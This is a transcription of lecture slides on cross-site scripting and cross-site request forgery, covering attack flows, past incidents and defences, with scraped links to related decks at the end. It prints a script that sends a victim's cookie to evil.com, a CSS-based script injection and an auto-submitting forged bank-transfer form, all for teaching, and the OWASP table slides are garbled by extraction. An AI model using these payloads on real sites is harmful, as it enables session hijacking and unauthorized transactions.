XSS and CSRF Nov 6, 2018

Size: px
Start display at page:

Download "XSS and CSRF Nov 6, 2018"

Transcription

1 XSS CSRF Nov 6, 2018 Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh

2 Exam Mean: 156 (82%): GREAT! Stddev 22, max %.

3 Scribe: Wen Zhang Presenter: Bron Lin

4 Trump s site hacked y apparently XSS!!!!

5 You could insert anything you wanted in the headlines by typing it into the URL a form of reflected XSS

6 This new category was created by merging 2010-A7 Insecure Cryptographic Storage & 2010-A9 - Insufficient Transport Thisnew newcategory categorywas was created merging 2010-A7 Insecure Cryptographic Storage& & - -Insufficient Transport This byby merging 2010-A7 Insecure Cryptographic Storage 2010-A9 - Insufficient Transport This new category wascreated created by merging 2010-A7 Insecure &2010-A A9 Insufficient Layer Protection, plus adding browser side sensitive data risks ascryptographic well. This newstorage category covers sensitive data Transport Layer Protection, plus adding browser side sensitive data risks as well. This new category covers sensitive data Layer plus browser side sensitive data risks as as well. This new category covers sensitive datadata LayerProtection, Protection, plusadding adding browser side sensitive data risks well. new category sensitive protection (other than access control which is covered by 2013-A A4 This 2013-A7) fromthe thecovers moment sensitive dataisis protection (other than access control which is covered by 2013-A7) from moment sensitive data protection (other than access control which is covered by 2013-A A7) from the moment sensitive data is is protection (other than access control which is covered by 2013-A A7) from the moment sensitive data provided by the user, sent to stored within the application, then then sent sent back backto tothe thebrowser browseragain. again. provided by the user, sent to stored within the application, provided stored within thethe application, then sent back to the browser again. providedbybythe theuser, user,sent senttoto stored within application, then sent back to the browser again. 5) We added: 2013-A9: Using Known Vulnerable Components: 5) We Weadded: added:2013-a9: 2013-A9:Using Using Known Vulnerable Components: 5)5) Vulnerable Components: We added: 2013-A9: UsingKnown Known Vulnerable Components: This issue was mentioned part 2010-A6 SecurityMisconfiguration, Misconfiguration, but now has category ofits itsown own asthe the Thisissue issuewas wasmentioned mentionedasas as part of 2010-A6 but now has aaacategory ++++ This part ofof 2010-A6 Security but now has a category ofof its asas the This issue was mentioned as part of 2010-A6 Security SecurityMisconfiguration, Misconfiguration, but now has category of own its own as the growth depth component based development has significantly increased the risk ofusing using known vulnerable growth depth depthofof of component based development has significantly increased the risk known vulnerable growth based development has significantly increased the risk ofof using known vulnerable growth depth ofcomponent component based development has significantly increased the risk of using known vulnerable components. components. components. components. Top web vulnerabilities OWASP Top (Previous) OWASPTop Top (Previous) OWASP OWASP Top (Previous) (Previous) OWASP Top (New) OWASP Top 10 (New) OWASP (New) OWASPTop Top (New) A1 Injection Injection A1 Injection A1 Injection Injection A1A1 Injection Injection A1 Injection A3 Broken BrokenAuthentication Authentication Session Management A3 Management Broken Authentication Session Management A3 Broken Authentication Session Session Management Broken Authentication Session Management A2A2 Broken Authentication Session Management Broken Authentication Session Management A2 Broken Authentication Session Management A2 Cross-Site Cross-SiteScripting Scripting(XSS) (XSS) A2 A2 Cross-Site Scripting (XSS) A2 Cross-Site Scripting (XSS) Cross-Site Scripting (XSS) A3A3 Cross-Site Scripting (XSS) A3 Cross-Site Scripting (XSS) A3 Cross-Site Scripting (XSS) A4 Insecure InsecureDirect DirectObject ObjectReferences References A4 A4 Insecure Direct Object References A4 Insecure Direct Object References Insecure Direct Object References A4A4 Insecure Direct Object References A4 Insecure Direct Object References A4 Insecure Direct Object References A6 Security SecurityMisconfiguration Misconfiguration A6 A6 A6 Security SecurityMisconfiguration Misconfiguration Security Misconfiguration A5A5 Security Misconfiguration A5 A5 Security Security Misconfiguration Misconfiguration A7 A7 Insecure InsecureCryptographic CryptographicStorage Storage Merged Mergedwith witha9a9 A7 A7 Insecure InsecureCryptographic CryptographicStorage Storage Merged Mergedwith witha9 A9 A6A6 Sensitive Data Exposure Sensitive Data Exposure A6 A6 Sensitive Sensitive Data Data Exposure Exposure A8 A8 Failure FailuretotoRestrict RestrictURL URLAccess Access Broadened Broadenedinto into A8 Failure Failureto torestrict RestrictURL URLAccess Access Broadened Broadenedinto into A8 A7A7 Missing Function Level Access Control Missing Function Level Access Control A7 Missing Missing Function Function Level Level Access Access Control Control A7 A5 A5 Cross-Site Cross-SiteRequest RequestForgery Forgery(CSRF) (CSRF) A5 Cross-Site Cross-SiteRequest RequestForgery Forgery(CSRF) (CSRF) A5 A8A8 Cross-Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) A8 Cross-Site Cross-Site Request Request Forgery Forgery (CSRF) (CSRF) A8 <buried <buriedinina6: A6:Security SecurityMisconfiguration> Misconfiguration> <buriedinina6: A6:Security SecurityMisconfiguration> Misconfiguration> <buried A10 A10 Unvalidated UnvalidatedRedirects Redirects Forwards Forwards A10 Unvalidated UnvalidatedRedirects Redirects Forwards Forwards A10 A9 A9 Insufficient InsufficientTransport TransportLayer LayerProtection Protection A9 Insufficient InsufficientTransport TransportLayer LayerProtection Protection A9 A9A9 Using Known Vulnerable Components Using Known Vulnerable Components A9 Using Using Known Known Vulnerable Vulnerable Components Components A9 A10 Unvalidated Redirects Forwards A10 Unvalidated Redirects Forwards A10 Unvalidated Unvalidated Redirects Redirects Forwards Forwards A10 Merged with 2010-A7 into new 2013-A6 Merged with 2010-A7 into new 2013-A6 Merged with with 2010-A A7 into into new new 2013-A A6 Merged 6

7 Cross-site scripting attack (XSS) Attacker injects a malicious script into the webpage viewed by a victim user n Script runs in user s browser with access to page s data The same-origin policy does not prevent XSS

8 Two main types of XSS Stored XSS: attacker leaves Javascript lying around on benign web service for victim to load Reflected XSS: attacker gets user to click on speciallycrafted URL with script in it, web service reflects it back

9 Stored (or persistent) XSS The attacker manages to store a malicious script at the web server, e.g., at bank.com The server later unwittingly sends script to a victim s browser Browser runs script in the same origin as the bank.com server

10 Demo + fix

11 Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com

12 Stored XSS (Cross-Site Scripting) Attack Browser/Server 1 Inject malicious script Server Patsy/Victim evil.com bank.com

13 Stored XSS (Cross-Site Scripting) Attack Browser/Server User Victim 1 evil.com Inject malicious script Server Patsy/Victim bank.com Stores the script!

14 Stored XSS (Cross-Site Scripting) Attack Browser/Server User Victim 1 evil.com Inject malicious script Server Patsy/Victim bank.com Stores the script!

15 Stored XSS (Cross-Site Scripting) Attack Browser/Server User Victim 1 evil.com Inject malicious script Server Patsy/Victim bank.com Stores the script!

16 Stored XSS (Cross-Site Scripting) Attack Browser/Server User Victim 4 1 Inject malicious script Server Patsy/Victim evil.com execute script embedded in input as though server meant us to run it bank.com Stores the script!

17 Stored XSS (Cross-Site Scripting) Attack Browser/Server User Victim 4 1 Inject malicious script Server Patsy/Victim evil.com execute script embedded in input as though server meant us to run it bank.com Stores the script!

18 Stored XSS (Cross-Site Scripting) Attack Browser/Server User Victim 4 1 Inject malicious script Server Patsy/Victim evil.com execute script Stores embedded in input the as though server script! meant E.g., us GET to run it

19 Stored XSS (Cross-Site Scripting) And/Or: Attack Browser/Server User Victim 6 1 evil.com Inject malicious script 4 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com Stores the script!

20 Stored XSS (Cross-Site Scripting) And/Or: Attack Browser/Server User Victim 6 1 evil.com E.g., GET Inject malicious script 4 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com Stores the script!

21 Stored XSS (Cross-Site Scripting) Attack Browser/Server User Victim 6 1 evil.com Inject malicious script 4 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com (A stored XSS attack)

22 XSS subverts the same origin policy Attack happens within the same origin Attacker tricks a server (e.g., bank.com) to send malicious script ot users User visits to bank.com Malicious script has origin of bank.com so it is permitted to access the resources on bank.com

23 MySpace.com (Samy worm) Users can post HTML on their pages n n MySpace.com ensures HTML contains no <script>, <body>, onclick, <a href=javascript://> but can do Javascript within CSS tags: <div style= background:url( javascript:alert(1) ) > With careful Javascript hacking, Samy worm infects anyone who visits an infected MySpace page n adds Samy as a friend. n Samy had millions of friends within 24 hours.

24 Twitter XSS vulnerability User figured out how to send a tweet that would automatically be retweeted by all followers using vulnerable TweetDeck apps.

25 Stored XSS using images Suppose pic.jpg on web server contains HTML! w request for results in: HTTP/ OK Content-Type: image/jpeg <html> fooled ya </html> w IE will render this as HTML (despite Content-Type) Consider photo sharing sites that support image uploads What if attacker uploads an image that is a script?

26 Reflected XSS The attacker gets the victim user to visit a URL for bank.com that embeds a malicious Javascript or malicious content The server echoes it back to victim user in its response Victim s browser executes the script within the same origin as bank.com

27 Reflected XSS (Cross-Site Scripting) Victim client

28 Reflected XSS (Cross-Site Scripting) 1 Attack Server evil.com Victim client

29 Reflected XSS (Cross-Site Scripting) 1 Attack Server 2 evil.com Victim client

30 Reflected XSS (Cross-Site Scripting) 1 Attack Server 2 Exact URL under attacker s control evil.com Victim client Server Patsy/Victim bank.com

31 Reflected XSS (Cross-Site Scripting) 1 Attack Server 2 evil.com Victim client Server Patsy/Victim bank.com

32 Reflected XSS (Cross-Site Scripting) 1 Attack Server 2 evil.com Victim client 5 execute script embedded in input as though server meant us to run it Server Patsy/Victim bank.com

33 Reflected XSS (Cross-Site Scripting) 1 Attack Server 2 evil.com Victim client 5 execute script embedded in input as though server meant us to run it Server Patsy/Victim bank.com

34 Reflected XSS (Cross-Site Scripting) And/Or: 1 Attack Server 2 7 evil.com Victim client 5 execute script embedded in input as though server meant us to run it Server Patsy/Victim bank.com

35 Reflected XSS (Cross-Site Scripting) Victim client 5 execute script embedded in input as though server meant us to run it Attack Server evil.com ( Reflected XSS attack) Server Patsy/Victim bank.com

36 Example of How Reflected XSS Can Come About User input is echoed into HTML response. Example: search field n n search.php responds with <HTML> <TITLE> Search Results </TITLE> <BODY> Results for $term :... </BODY> </HTML> How does an attacker who gets you to visit evil.com exploit this?

37 Injection Via Script-in-URL Consider this link on evil.com: (properly URL encoded) <script> window.open( " = " + document.cookie ) </script> What if user clicks on this link? 1) Browser goes to bank.com/search.php?... 2) bank.com returns <HTML> Results for <script> </script> 3) Browser executes script in same origin as bank.com Sends to evil.com the cookie for bank.com

38 2006 Example Vulnerability Attackers contacted users via fooled them into accessing a particular URL hosted on the legitimate PayPal website. Injected code redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were then redirected to a phishing site prompted to enter sensitive financial data. Source:

39 You could insert anything you wanted in the headlines by typing it into the URL a form of reflected XSS

40 Reflected XSS: Summary Target: user with Javascript-enabled browser who visits a vulnerable web service that will include parts of URLs it receives in the web page output it generates Attacker goal: run script in user s browser with same access as provided to server s regular scripts (subvert SOP = Same Origin Policy) Attacker tools: ability to get user to click on a speciallycrafted URL; optionally, a server used to receive stolen information such as cookies Key trick: server fails to ensure that output it generates does not contain embedded scripts other than its own

41 Preventing XSS Web server must perform: Input validation: check that inputs are of expected form (whitelisting) n Avoid blacklisting; it doesn t work well Output escaping: escape dynamic data before inserting it into HTML

42 Output escaping n HTML parser looks for special characters: < > & n n w <html>, <div>, <script> w such sequences trigger actions, e.g., running script Ideally, user-provided input string should not contain special chars If one wants to display these special characters in a webpage without the parser triggering action, one has to escape the parser Character Escape sequence < < > > & &amp " &#39;

43 Direct vs escaped embedding Attacker input: direct <html> Comment: <script> </script> </html> browser rendering Attack! Script runs! <script> </script> escaped <html> Comment: <script> </script> </html> browser rendering Comment: <script> </script> Script does not run but gets displayed!

44 Escape user input!

45 XSS prevention (cont d): Contentsecurity policy (CSP) Have web server supply a whitelist of the scripts that are allowed to appear on a page n Web developer specifies the domains the browser should allow for executable scripts, disallowing all other scripts (including inline scripts) Can opt to globally disallow script execution

46 XSS Summary XSS: Attacker injects a malicious script into the webpage viewed by a victim user n n Script runs in user s browser with access to page s data Bypasses the same-origin policy Fixes: validate/escape input/output, use CSP

47 CSRF

48 Cross Site Request Forgery (CSRF)

49 This new category was created by merging 2010-A7 Insecure Cryptographic Storage & 2010-A9 - Insufficient Transport Thisnew newcategory categorywas was created merging 2010-A7 Insecure Cryptographic Storage& & - -Insufficient Transport This byby merging 2010-A7 Insecure Cryptographic Storage 2010-A9 - Insufficient Transport This new category wascreated created by merging 2010-A7 Insecure &2010-A A9 Insufficient Layer Protection, plus adding browser side sensitive data risks ascryptographic well. This newstorage category covers sensitive data Transport Layer Protection, plus adding browser side sensitive data risks as well. This new category covers sensitive data Layer plus browser side sensitive data risks as as well. This new category covers sensitive datadata LayerProtection, Protection, plusadding adding browser side sensitive data risks well. new category sensitive protection (other than access control which is covered by 2013-A A4 This 2013-A7) fromthe thecovers moment sensitive dataisis protection (other than access control which is covered by 2013-A7) from moment sensitive data protection (other than access control which is covered by 2013-A A7) from the moment sensitive data is is protection (other than access control which is covered by 2013-A A7) from the moment sensitive data provided by the user, sent to stored within the application, then then sent sent back backto tothe thebrowser browseragain. again. provided by the user, sent to stored within the application, provided stored within thethe application, then sent back to the browser again. providedbybythe theuser, user,sent senttoto stored within application, then sent back to the browser again. 5) We added: 2013-A9: Using Known Vulnerable Components: 5) We Weadded: added:2013-a9: 2013-A9:Using Using Known Vulnerable Components: 5)5) Vulnerable Components: We added: 2013-A9: UsingKnown Known Vulnerable Components: This issue was mentioned part 2010-A6 SecurityMisconfiguration, Misconfiguration, but now has category ofits itsown own asthe the Thisissue issuewas wasmentioned mentionedasas as part of 2010-A6 but now has aaacategory ++++ This part ofof 2010-A6 Security but now has a category ofof its asas the This issue was mentioned as part of 2010-A6 Security SecurityMisconfiguration, Misconfiguration, but now has category of own its own as the growth depth component based development has significantly increased the risk ofusing using known vulnerable growth depth depthofof of component based development has significantly increased the risk known vulnerable growth based development has significantly increased the risk ofof using known vulnerable growth depth ofcomponent component based development has significantly increased the risk of using known vulnerable components. components. components. components. Top web vulnerabilities OWASP Top (Previous) OWASPTop Top (Previous) OWASP OWASP Top (Previous) (Previous) OWASP Top (New) OWASP Top 10 (New) OWASP (New) OWASPTop Top (New) A1 Injection Injection A1 Injection A1 Injection Injection A1A1 Injection Injection A1 Injection A3 Broken BrokenAuthentication Authentication Session Management A3 Management Broken Authentication Session Management A3 Broken Authentication Session Session Management Broken Authentication Session Management A2A2 Broken Authentication Session Management Broken Authentication Session Management A2 Broken Authentication Session Management A2 Cross-Site Cross-SiteScripting Scripting(XSS) (XSS) A2 A2 Cross-Site Scripting (XSS) A2 Cross-Site Scripting (XSS) Cross-Site Scripting (XSS) A3A3 Cross-Site Scripting (XSS) A3 Cross-Site Scripting (XSS) A3 Cross-Site Scripting (XSS) A4 Insecure InsecureDirect DirectObject ObjectReferences References A4 A4 Insecure Direct Object References A4 Insecure Direct Object References Insecure Direct Object References A4A4 Insecure Direct Object References A4 Insecure Direct Object References A4 Insecure Direct Object References A6 Security SecurityMisconfiguration Misconfiguration A6 A6 A6 Security SecurityMisconfiguration Misconfiguration Security Misconfiguration A5A5 Security Misconfiguration A5 A5 Security Security Misconfiguration Misconfiguration A7 A7 Insecure InsecureCryptographic CryptographicStorage Storage Merged Mergedwith witha9a9 A7 A7 Insecure InsecureCryptographic CryptographicStorage Storage Merged Mergedwith witha9 A9 A6A6 Sensitive Data Exposure Sensitive Data Exposure A6 A6 Sensitive Sensitive Data Data Exposure Exposure A8 A8 Failure FailuretotoRestrict RestrictURL URLAccess Access Broadened Broadenedinto into A8 Failure Failureto torestrict RestrictURL URLAccess Access Broadened Broadenedinto into A8 A7A7 Missing Function Level Access Control Missing Function Level Access Control A7 Missing Missing Function Function Level Level Access Access Control Control A7 A5 A5 Cross-Site Cross-SiteRequest RequestForgery Forgery(CSRF) (CSRF) A5 Cross-Site Cross-SiteRequest RequestForgery Forgery(CSRF) (CSRF) A5 A8A8 Cross-Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) A8 Cross-Site Cross-Site Request Request Forgery Forgery (CSRF) (CSRF) A8 <buried <buriedinina6: A6:Security SecurityMisconfiguration> Misconfiguration> <buriedinina6: A6:Security SecurityMisconfiguration> Misconfiguration> <buried A10 A10 Unvalidated UnvalidatedRedirects Redirects Forwards Forwards A10 Unvalidated UnvalidatedRedirects Redirects Forwards Forwards A10 A9 A9 Insufficient InsufficientTransport TransportLayer LayerProtection Protection A9 Insufficient InsufficientTransport TransportLayer LayerProtection Protection A9 A9A9 Using Known Vulnerable Components Using Known Vulnerable Components A9 Using Using Known Known Vulnerable Vulnerable Components Components A9 A10 Unvalidated Redirects Forwards A10 Unvalidated Redirects Forwards A10 Unvalidated Unvalidated Redirects Redirects Forwards Forwards A10 Merged with 2010-A7 into new 2013-A6 Merged with 2010-A7 into new 2013-A6 Merged with with 2010-A A7 into into new new 2013-A A6 Merged 49

50 HTML Forms Allow a user to provide some data which gets sent with an HTTP POST request to a server <form action="bank.com/action.php"> First name: <input type="text" name="firstname"> Last name:<input type="text" name="lastname"> <input type="submit" value="submit"></form> When filling in Alice Smith, clicking submit, the browser issues HTTP POST request bank.com/action.php?firstname=alice&lastname=smith As always, the browser attaches relevant cookies

51 Recall: session using cookies Browser Server

52 Basic picture Server Victim bank.com User Victim cookie for bank.com What can go bad? Attack Server URL contains transaction action, bank checks cookie

53 Cross Site Request Forgery (CSRF) Example: n User logs in to bank.com w Session cookie remains in browser state n User visits malicious site containing: <form name=f action= <input name=recipient value=badguy> <script> document.f.submit(); </script> n Browser sends user auth cookie with request w Transaction will be fulfilled Problem: n cookie auth is insufficient when side effects occur

54 Form post with cookie Cookie: SessionID=523FA4cd2E User credentials

55 Form post with cookie Cookie: SessionID=523FA4cd2E User credentials

56 2008 CSRF attack An attacker could add videos to a user s "Favorites," add himself to a user s "Friend" or "Family" list, send arbitrary messages on the user s behalf, flagged videos as inappropriate, automatically shared a video with a user s contacts, subscribed a user to a "channel" (a set of videos published by one person or group), added videos to a user s "QuickList" (a list of videos a user intends to watch at a later point).

57

58 Defenses

59 CSRF Defenses Secret Validation Token <input type=hidden value=23a3af01b> Referer Validation Others (e.g., custom HTTP Header) Referer: X-Requested-By: XMLHttpRequest

60 Secret Token Validation The server requests a secret token for every action, the user s browser obtained this token if the user visited the site browsed to that action, instead of directly sending an action; attacker won t have the token 1. goodsite.com server includes a secret token into the webpage (e.g., in forms as a hidden field) 2. Requests to goodsite.com include the secret 3. goodsite.com server checks that the token embedded in the webpage is the expected one; reject request if not Can the token be? Dateofbirth Validation token must be hard to guess by the attacker

61 How token is used! The server stores state that binds the user's CSRF token to the user's session id! Embeds CSRF token in every form! On every request the server validates that the supplied CSRF token is associated with the user's session id! Disadvantage is that the server needs to maintain a large state table to validate the tokens.

62 Other CRSF protection: Referer Validation When the browser issues an HTTP request, it includes a referer header that indicates which URL initiated the request This information in the Referer header could be used to distinguish between same site request cross site request

63 Referer Validation

64 Referer Validation Defense HTTP Referer header n n n Referer: Referer: Referer: w Strict policy disallows (secure, less usable) w Lenient policy allows (less secure, more usable) ü û?

65 Privacy Issues with Referer header! The referer contains sensitive information that impinges on the privacy! The referer header reveals contents of the search query that lead to visit a website.! Some organizations are concerned that confidential information about their corporate intranet might leak to external websites via Referer header

66 Referer Privacy Problems Referer may leak privacy-sensitive information projects/iphone/competitors.html Common sources of blocking: n n n n Network stripping by the organization Network stripping by local machine Stripped by browser for HTTPS -> HTTP transitions User preference in browser Hence, such block might help attackers in the lenient policy case

67 Custom HTTP Headers Browsers prevent sites from sending custom HTTP headers to another site but allow sites to send custom HTTP headers to themselves. Cookie value is not actually required to prevent CSRF attacks, the mere presence of the header is sufficient. To use this scheme as a CSRF Defense, a site must issue all state modifying requests using XMLHttpRequest, attach the header reject all requests that do not accompany the header.

68 Custom Header Defense XMLHttpRequest is for same-origin requests n Can use setrequestheader within origin Limitations on data export format n n No setrequestheader equivalent XHR2 has a whitelist for cross-site requests Issue POST requests via AJAX: Doesn't work across domains X-Requested-By: XMLHttpRequest

69 Summary: sessions CSRF Cookies add state to HTTP n n Cookies are used for session management They are attached by the browser automatically to HTTP requests CSRF attacks execute request on benign site because cookie is sent automatically Defenses for CSRF: n n embed unpredicatable token check it later check referer header

70 Questions?

Web Security: XSS; Sessions

Web Security: XSS; Sessions Web Security: XSS; Sessions CS 161: Computer Security Prof. Raluca Ada Popa Mar 22, 2018 Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh SQL Injection

More information

Information Security CS 526 Topic 8

Information Security CS 526 Topic 8 Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive

More information

Information Security CS 526 Topic 11

Information Security CS 526 Topic 11 Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive

More information

Computer Security CS 426 Lecture 41

Computer Security CS 426 Lecture 41 Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery CS426 Fall 2010/Lecture 36 1 StuxNet: Overview Windows-based Worm First reported in June 2010, the general

More information

Web basics: HTTP cookies

Web basics: HTTP cookies Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the

More information

Web basics: HTTP cookies

Web basics: HTTP cookies Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the

More information

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends

More information

WEB SECURITY: XSS & CSRF

WEB SECURITY: XSS & CSRF WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often

More information

Web Security: Cross-Site Attacks

Web Security: Cross-Site Attacks Web Security: Cross-Site Attacks CS 161: Computer Security Prof. Vern Paxson TAs: Paul Bramsen, Apoorva Dornadula, David Fifield, Mia Gil Epner, David Hahn, Warren He, Grant Ho, Frank Li, Nathan Malkin,

More information

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised

More information

Web Security: Web Application Security [continued]

Web Security: Web Application Security [continued] CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Web Application Security [continued] Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,

More information

Web Application Security. Philippe Bogaerts

Web Application Security. Philippe Bogaerts Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security

More information

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application

More information

CIS 5373 Systems Security

CIS 5373 Systems Security CIS 5373 Systems Security Topic 5.2: Web Security Attacks Endadul Hoque Slide Acknowledgment Contents are based on slides from Cristina Nita-Rotaru (Northeastern) Wil Robertson (Northeastern) John Mitchell

More information

CS 142 Winter Session Management. Dan Boneh

CS 142 Winter Session Management. Dan Boneh CS 142 Winter 2009 Session Management Dan Boneh Sessions A sequence of requests and responses from one browser to one (or more) sites Session can be long (Gmail - two weeks) or short without session mgmt:

More information

Web Security, Part 2

Web Security, Part 2 Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/

More information

Web Security: Session management and CSRF

Web Security: Session management and CSRF Web Security: Sessio maagemet ad CSRF CS 161: Computer Security Prof. Raluca Ada Popa April 5, 2018 Credit: this deck is a combiatio of my slides ad slide adaptatios from previous offerigs of this course

More information

Web Security II. Slides from M. Hicks, University of Maryland

Web Security II. Slides from M. Hicks, University of Maryland Web Security II Slides from M. Hicks, University of Maryland Recall: Putting State to HTTP Web application maintains ephemeral state Server processing often produces intermediate results; not long-lived

More information

CIS 4360 Secure Computer Systems XSS

CIS 4360 Secure Computer Systems XSS CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection

More information

Web Security Part 2. Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu

Web Security Part 2. Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu Web Security Part 2 CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu Liberal borrowing from Mitchell, Boneh, Stanford CS 155 University of Wisconsin

More information

NET 311 INFORMATION SECURITY

NET 311 INFORMATION SECURITY NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)

More information

P2_L12 Web Security Page 1

P2_L12 Web Security Page 1 P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction

More information

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin Web Attacks, con t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 24, 2011 Announcements Guest lecture

More information

CS 161 Computer Security

CS 161 Computer Security Paxson Spring 2017 CS 161 Computer Security Discussion 4 Week of February 13, 2017 Question 1 Clickjacking (5 min) Watch the following video: https://www.youtube.com/watch?v=sw8ch-m3n8m Question 2 Session

More information

Web Application Security

Web Application Security CS 155 Spring 2013 Web Application Security John Mitchell Three top web site vulnerabilites SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL query CSRF Cross-site

More information

CS526: Information security

CS526: Information security Cristina Nita-Rotaru CS526: Information security Readings for This Lecture Wikipedia } HTTP Cookie } Same Origin Policy } Cross Site Scripting } Cross Site Request Forgery 2 1: Background Background }

More information

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun Secure Coding String management Pointer Subterfuge Dynamic memory management Integer security Formatted output

More information

Web Application Security

Web Application Security CS 155 Spring 2016 Web Application Security 47,350,400 John Mitchell Acknowledgments: Lecture slides are from the Computer Security course taught by Dan Boneh and John Mitchell at Stanford University.

More information

CSCD 303 Essential Computer Security Fall 2018

CSCD 303 Essential Computer Security Fall 2018 CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server

More information

Web Security: Web Application Security [continued]

Web Security: Web Application Security [continued] CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Web Application Security [continued] Spring 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,

More information

CSCD 303 Essential Computer Security Fall 2017

CSCD 303 Essential Computer Security Fall 2017 CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate the security of the

More information

Robust Defenses for Cross-Site Request Forgery

Robust Defenses for Cross-Site Request Forgery Robust Defenses for Cross-Site Request Forgery Tsampanaki Nikoleta Lilitsis Prodromos Gigis Petros Paper Authors: Adam Barth, Collin Jackson, John C. Mitchell Outline What is CSRF attack? What is a login

More information

Web Security Part 2. Professor Ristenpart h9p:// rist at cs dot wisc dot edu

Web Security Part 2. Professor Ristenpart h9p://  rist at cs dot wisc dot edu Web Security Part 2 CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu Liberal borrowing from Mitchell, Boneh, Stanford CS 155 University of Wisconsin

More information

Robust Defenses for Cross-Site Request Forgery Review

Robust Defenses for Cross-Site Request Forgery Review Robust Defenses for Cross-Site Request Forgery Review Network Security Instructor:Dr. Shishir Nagaraja Submitted By: Jyoti Leeka October 16, 2011 1 Introduction to the topic and the reason for the topic

More information

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11 Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:

More information

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP OWASP Top 10 Risks Dean.Bushmiller@ExpandingSecurity.com Many thanks to Dave Wichers & OWASP My Mom I got on the email and did a google on my boy My boy works in this Internet thing He makes cyber cafes

More information

Web Security IV: Cross-Site Attacks

